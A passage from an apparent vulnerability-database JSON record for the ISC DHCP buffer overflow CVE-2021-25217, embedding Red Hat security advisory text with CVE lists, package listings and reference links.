site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. See\nthe following Release Notes documentation, which will be updated shortly\nfor this release, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana\ngement_for_kubernetes/2.3/html/release_notes/\n\nSecurity:\n\n* fastify-reply-from: crafted URL allows prefix scape of the proxied\nbackend service (CVE-2021-21321)\n\n* fastify-http-proxy: crafted URL allows prefix scape of the proxied\nbackend service (CVE-2021-21322)\n\n* nodejs-netmask: improper input validation of octal input data\n(CVE-2021-28918)\n\n* redis: Integer overflow via STRALGO LCS command (CVE-2021-29477)\n\n* redis: Integer overflow via COPY command for large intsets\n(CVE-2021-29478)\n\n* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)\n\n* nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions\n(CVE-2020-28500)\n\n* golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing\n- -u- extension (CVE-2020-28851)\n\n* golang.org/x/text: Panic in language.ParseAcceptLanguage while processing\nbcp47 tag (CVE-2020-28852)\n\n* nodejs-ansi_up: XSS due to insufficient URL sanitization (CVE-2021-3377)\n\n* oras: zip-slip vulnerability via oras-pull (CVE-2021-21272)\n\n* redis: integer overflow when configurable limit for maximum supported\nbulk input size is too big on 32-bit platforms (CVE-2021-21309)\n\n* nodejs-lodash: command injection via template (CVE-2021-23337)\n\n* nodejs-hosted-git-info: Regular Expression denial of service via\nshortcutMatch in fromUrl() (CVE-2021-23362)\n\n* browserslist: parsing of invalid queries could result in Regular\nExpression Denial of Service (ReDoS) (CVE-2021-23364)\n\n* nodejs-postcss: Regular expression denial of service during source map\nparsing (CVE-2021-23368)\n\n* nodejs-handlebars: Remote code execution when compiling untrusted compile\ntemplates with strict:true option (CVE-2021-23369)\n\n* nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in\nlib/previous-map.js (CVE-2021-23382)\n\n* nodejs-handlebars: Remote code execution when compiling untrusted compile\ntemplates with compat:true option (CVE-2021-23383)\n\n* openssl: integer overflow in CipherUpdate (CVE-2021-23840)\n\n* openssl: NULL pointer dereference in X509_issuer_and_serial_hash()\n(CVE-2021-23841)\n\n* nodejs-ua-parser-js: ReDoS via malicious User-Agent header\n(CVE-2021-27292)\n\n* grafana: snapshot feature allow an unauthenticated remote attacker to\ntrigger a DoS via a remote API call (CVE-2021-27358)\n\n* nodejs-is-svg: ReDoS via malicious string (CVE-2021-28092)\n\n* nodejs-netmask: incorrectly parses an IP address that has octal integer\nwith invalid character (CVE-2021-29418)\n\n* ulikunitz/xz: Infinite loop in readUvarint allows for denial of service\n(CVE-2021-29482)\n\n* normalize-url: ReDoS for data URLs (CVE-2021-33502)\n\n* nodejs-trim-newlines: ReDoS in .end() method (CVE-2021-33623)\n\n* nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe\n(CVE-2021-23343)\n\n* html-parse-stringify: Regular Expression DoS (CVE-2021-23346)\n\n* openssl: incorrect SSLv2 rollback protection (CVE-2021-23839)\n\nFor more details about the security issues, including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npages listed in the References section. \n\nBugs:\n\n* RFE Make the source code for the endpoint-metrics-operator public (BZ#\n1913444)\n\n* cluster became offline after apiserver health check (BZ# 1942589)\n\n3. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n1913333 - CVE-2020-28851 golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing -u- extension\n1913338 - CVE-2020-28852 golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag\n1913444 - RFE Make the source code for the endpoint-metrics-operator public\n1921286 - CVE-2021-21272 oras: zip-slip vulnerability via oras-pull\n1927520 - RHACM 2.3.0 images\n1928937 - CVE-2021-23337 nodejs-lodash: command injection via template\n1928954 - CVE-2020-28500 nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions\n1930294 - CVE-2021-23839 openssl: incorrect SSLv2 rollback protection\n1930310 - CVE-2021-23841 openssl: NULL pointer dereference in X509_issuer_and_serial_hash()\n1930324 - CVE-2021-23840 openssl: integer overflow in CipherUpdate\n1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms\n1936427 - CVE-2021-3377 nodejs-ansi_up: XSS due to insufficient URL sanitization\n1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string\n1940196 - View Resource YAML option shows 404 error when reviewing a Subscription for an application\n1940613 - CVE-2021-27292 nodejs-ua-parser-js: ReDoS via malicious User-Agent header\n1941024 - CVE-2021-27358 grafana: snapshot feature allow an unauthenticated remote attacker to trigger a DoS via a remote API call\n1941675 - CVE-2021-23346 html-parse-stringify: Regular Expression DoS\n1942178 - CVE-2021-21321 fastify-reply-from: crafted URL allows prefix scape of the proxied backend service\n1942182 - CVE-2021-21322 fastify-http-proxy: crafted URL allows prefix scape of the proxied backend service\n1942589 - cluster became offline after apiserver health check\n1943208 - CVE-2021-23362 nodejs-hosted-git-info: Regular Expression denial of service via shortcutMatch in fromUrl()\n1944822 - CVE-2021-29418 nodejs-netmask: incorrectly parses an IP address that has octal integer with invalid character\n1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data\n1945459 - CVE-2020-28469 nodejs-glob-parent: Regular expression denial of service\n1948761 - CVE-2021-23369 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with strict:true option\n1948763 - CVE-2021-23368 nodejs-postcss: Regular expression denial of service during source map parsing\n1954150 - CVE-2021-23382 nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in lib/previous-map.js\n1954368 - CVE-2021-29482 ulikunitz/xz: Infinite loop in readUvarint allows for denial of service\n1955619 - CVE-2021-23364 browserslist: parsing of invalid queries could result in Regular Expression Denial of Service (ReDoS)\n1956688 - CVE-2021-23383 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with compat:true option\n1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe\n1957410 - CVE-2021-29477 redis: Integer overflow via STRALGO LCS command\n1957414 - CVE-2021-29478 redis: Integer overflow via COPY command for large intsets\n1964461 - CVE-2021-33502 normalize-url: ReDoS for data URLs\n1966615 - CVE-2021-33623 nodejs-trim-newlines: ReDoS in .end() method\n1968122 - clusterdeployment fails because hiveadmission sc does not have correct permissions\n1972703 - Subctl fails to join cluster, since it cannot auto-generate a valid cluster id\n1983131 - Defragmenting an etcd member doesn\u0027t reduce the DB size (7.5GB) on a setup with ~1000 spoke clusters\n\n5. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: dhcp security update\nAdvisory ID: RHSA-2021:2357-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:2357\nIssue date: 2021-06-09\nCVE Names: CVE-2021-25217\n====================================================================\n1. Summary:\n\nAn update for dhcp is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress. The dhcp packages provide a relay agent and ISC DHCP service\nrequired to enable and administer DHCP on a network. \n\nSecurity Fix(es):\n\n* dhcp: stack-based buffer overflow when parsing statements with\ncolon-separated hex digits in config or lease files in dhcpd and dhclient\n(CVE-2021-25217)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1963258 - CVE-2021-25217 dhcp: stack-based buffer overflow when parsing statements with colon-separated hex digits in config or lease files in dhcpd and dhclient\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\ndhcp-4.2.5-83.el7_9.1.src.rpm\n\nx86_64:\ndhclient-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-common-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-libs-4.2.5-83.el7_9.1.i686.rpm\ndhcp-libs-4.2.5-83.el7_9.1.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\ndhcp-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-devel-4.2.5-83.el7_9.1.i686.rpm\ndhcp-devel-4.2.5-83.el7_9.1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\ndhcp-4.2.5-83.el7_9.1.src.rpm\n\nx86_64:\ndhclient-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-common-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-libs-4.2.5-83.el7_9.1.i686.rpm\ndhcp-libs-4.2.5-83.el7_9.1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\ndhcp-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-devel-4.2.5-83.el7_9.1.i686.rpm\ndhcp-devel-4.2.5-83.el7_9.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\ndhcp-4.2.5-83.el7_9.1.src.rpm\n\nppc64:\ndhclient-4.2.5-83.el7_9.1.ppc64.rpm\ndhcp-4.2.5-83.el7_9.1.ppc64.rpm\ndhcp-common-4.2.5-83.el7_9.1.ppc64.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.ppc.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.ppc64.rpm\ndhcp-libs-4.2.5-83.el7_9.1.ppc.rpm\ndhcp-libs-4.2.5-83.el7_9.1.ppc64.rpm\n\nppc64le:\ndhclient-4.2.5-83.el7_9.1.ppc64le.rpm\ndhcp-4.2.5-83.el7_9.1.ppc64le.rpm\ndhcp-common-4.2.5-83.el7_9.1.ppc64le.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.ppc64le.rpm\ndhcp-libs-4.2.5-83.el7_9.1.ppc64le.rpm\n\ns390x:\ndhclient-4.2.5-83.el7_9.1.s390x.rpm\ndhcp-4.2.5-83.el7_9.1.s390x.rpm\ndhcp-common-4.2.5-83.el7_9.1.s390x.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.s390.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.s390x.rpm\ndhcp-libs-4.2.5-83.el7_9.1.s390.rpm\ndhcp-libs-4.2.5-83.el7_9.1.s390x.rpm\n\nx86_64:\ndhclient-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-common-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-libs-4.2.5-83.el7_9.1.i686.rpm\ndhcp-libs-4.2.5-83.el7_9.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\ndhcp-debuginfo-4.2.5-83.el7_9.1.ppc.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.ppc64.rpm\ndhcp-devel-4.2.5-83.el7_9.1.ppc.rpm\ndhcp-devel-4.2.5-83.el7_9.1.ppc64.rpm\n\nppc64le:\ndhcp-debuginfo-4.2.5-83.el7_9.1.ppc64le.rpm\ndhcp-devel-4.2.5-83.el7_9.1.ppc64le.rpm\n\ns390x:\ndhcp-debuginfo-4.2.5-83.el7_9.1.s390.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.s390x.rpm\ndhcp-devel-4.2.5-83.el7_9.1.s390.rpm\ndhcp-devel-4.2.5-83.el7_9.1.s390x.rpm\n\nx86_64:\ndhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-devel-4.2.5-83.el7_9.1.i686.rpm\ndhcp-devel-4.2.5-83.el7_9.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\ndhcp-4.2.5-83.el7_9.1.src.rpm\n\nx86_64:\ndhclient-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-common-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-libs-4.2.5-83.el7_9.1.i686.rpm\ndhcp-libs-4.2.5-83.el7_9.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\ndhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-devel-4.2.5-83.el7_9.1.i686.rpm\ndhcp-devel-4.2.5-83.el7_9.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-25217\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYMCeytzjgjWX9erEAQgPYw/+K6NTT5tvNy0WHRy46UioFuzIbxlMOPzm\nzXmk61B2Dgod7DCU3EbF9u7nSViaQds11pDCrTejH70WrqNQSaWMhsASgtNmQ42q\n0oVWQwqyB8mP/73BwYJQ84eZDGwsyqQf/9MO96g4c0jlZOAu9vSxvSflQ4DY8m9L\n0+pk3/zHOsUz3Za7Ns/1wa8pmq3hxAt0z6Z6ri0Ka8CEHg7W7ELGC67ih1BOcpP5\nmdWOSfTW+F1EzmerDW0eom09R/Ndfo/FdGeCbEq1K6kvcrPy4e/tsyBCquPYPFar\naTADxJPMObDTY0dJhqw1qZ5cERLnhJaj8GzWc0Ne2KIAFig/NcVhEZL8RtvrNWhO\nJIaVZ7zK6bi1VASVVIAP8yQzwdZFEbfMREOa705gMvXMz1Ux08YvsbrelD/LeJXe\n45C2+zGvM7KDd/AlrhopZPbBJI07tbNe8qWzFggJtBTMVg28i5K7DjFjvASFZFrV\n8nKdWae1GOEtH23fygGOoW4m0KkGWd1Tc/lte6Wy788KOa/yF3IQkWeTSo5KG33Q\nUHCzx6NzHyeAgW7K9QvvpIjfbxIAyBbebsIkhOhySjfsAp28lKkaZZRVF/sNWIvG\nGRibEMi366KUTR5AiTMAjHoYgIDzp7nywWiYBhf9SuNgqV3kG0Yz7fd1ac0+qcH5\nzPKanVJNoQs=9+pl\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-25217"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-001741"
},
{
"db": "VULMON",
"id": "CVE-2021-25217"
},
{
"db": "PACKETSTORM",
"id": "163789"
},
{
"db": "PACKETSTORM",
"id": "163747"
},
{
"db": "PACKETSTORM",
"id": "163196"
},
{
"db": "PACKETSTORM",
"id": "163155"
},
{
"db": "PACKETSTORM",
"id": "163144"
},
{
"db": "PACKETSTORM",
"id": "163145"
},
{
"db": "PACKETSTORM",
"id": "163051"
}
],
"trust": 2.34
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-25217",
"trust": 3.2
},
{
"db": "SIEMENS",
"id": "SSA-637483",
"trust": 1.7
},
{
"db": "SIEMENS",
"id": "SSA-406691",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/05/26/6",
"trust": 1.7
},
{
"db": "ICS CERT",
"id": "ICSA-22-258-05",
"trust": 1.5
},
{
"db": "JVN",
"id": "JVNVU99475301",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU95111565",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-001741",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "163196",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "163051",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2021.2711",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2508",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2120",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1874",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1935",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2072",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1834",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4616",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2158",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2320",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2657",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021070616",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021062228",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021122914",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021052708",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021071311",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031109",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021061429",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021060933",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021052902",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021060134",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "163137",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "162840",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "163129",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "163400",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1759",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-25217",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163789",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163747",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163155",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163144",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163145",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-25217"
},
{
"db": "PACKETSTORM",
"id": "163789"
},
{
"db": "PACKETSTORM",
"id": "163747"
},
{
"db": "PACKETSTORM",
"id": "163196"
},
{
"db": "PACKETSTORM",
"id": "163155"
},
{
"db": "PACKETSTORM",
"id": "163144"
},
{
"db": "PACKETSTORM",
"id": "163145"
},
{
"db": "PACKETSTORM",
"id": "163051"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1759"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-001741"
},
{
"db": "NVD",
"id": "CVE-2021-25217"
}
]
},
"id": "VAR-202105-1325",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.366531175
},
"last_update_date": "2026-04-10T22:10:16.456000Z",
"patch": {
"_id": null,
"data": [
{
"title": "ISC\u00a0DHCP\u00a0 buffer overflow vulnerability in",
"trust": 0.8,
"url": "https://kb.isc.org/docs/cve-2021-25217"
},
{
"title": "Debian CVElist Bug Report Logs: isc-dhcp: CVE-2021-25217: A buffer overrun in lease file parsing code can be used to exploit a common vulnerability shared by dhcpd and dhclient",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=b55bb445f71f0d88702845d3582e2b5c"
},
{
"title": "Amazon Linux AMI: ALAS-2021-1510",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2021-1510"
},
{
"title": "Amazon Linux 2: ALAS2-2021-1654",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2021-1654"
},
{
"title": "Red Hat: CVE-2021-25217",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2021-25217"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-25217 log"
},
{
"title": "Palo Alto Networks Security Advisory: PAN-SA-2024-0001 Informational Bulletin: Impact of OSS CVEs in PAN-OS",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=palo_alto_networks_security_advisory\u0026qid=34f98e4f4344c97599fe2d33618956a7"
},
{
"title": "Completion for lacework",
"trust": 0.1,
"url": "https://github.com/fbreton/lacework "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-25217"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-001741"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-119",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-25217"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.7,
"url": "https://kb.isc.org/docs/cve-2021-25217"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/05/26/6"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00002.html"
},
{
"trust": 1.7,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-406691.pdf"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20220325-0011/"
},
{
"trust": 1.7,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf"
},
{
"trust": 1.7,
"url": "https://security.gentoo.org/glsa/202305-22"
},
{
"trust": 1.3,
"url": "https://access.redhat.com/security/cve/cve-2021-25217"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/z2lb42jwiv4m4wdnxx5vgip26feywkif/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5qi4dyc7j4bghew3nh4xhmwthyc36uk4/"
},
{
"trust": 0.9,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-258-05"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu95111565"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu99475301/"
},
{
"trust": 0.7,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.7,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.6,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/z2lb42jwiv4m4wdnxx5vgip26feywkif/"
},
{
"trust": 0.6,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5qi4dyc7j4bghew3nh4xhmwthyc36uk4/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163051/red-hat-security-advisory-2021-2357-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031109"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021060933"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2508"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163137/red-hat-security-advisory-2021-2418-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2657"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021071311"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2711"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021061429"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2320"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163400/red-hat-security-advisory-2021-2555-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2120"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021070616"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021062228"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/isc-dhcp-denial-of-service-via-lease-file-parsing-35555"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163129/red-hat-security-advisory-2021-2405-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021052902"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021122914"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162840/ubuntu-security-notice-usn-4969-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163196/red-hat-security-advisory-2021-2469-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021052708"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4616"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6490433"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1874"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1935"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1834"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2158"
},
{
"trust": 0.6,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-258-05"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6498095"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021060134"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2072"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-25217"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-8286"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-28196"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-15358"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14502"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3520"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-13434"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3537"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-8231"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-33909"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-27219"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3518"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-32399"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-29362"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3516"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13434"
},
{
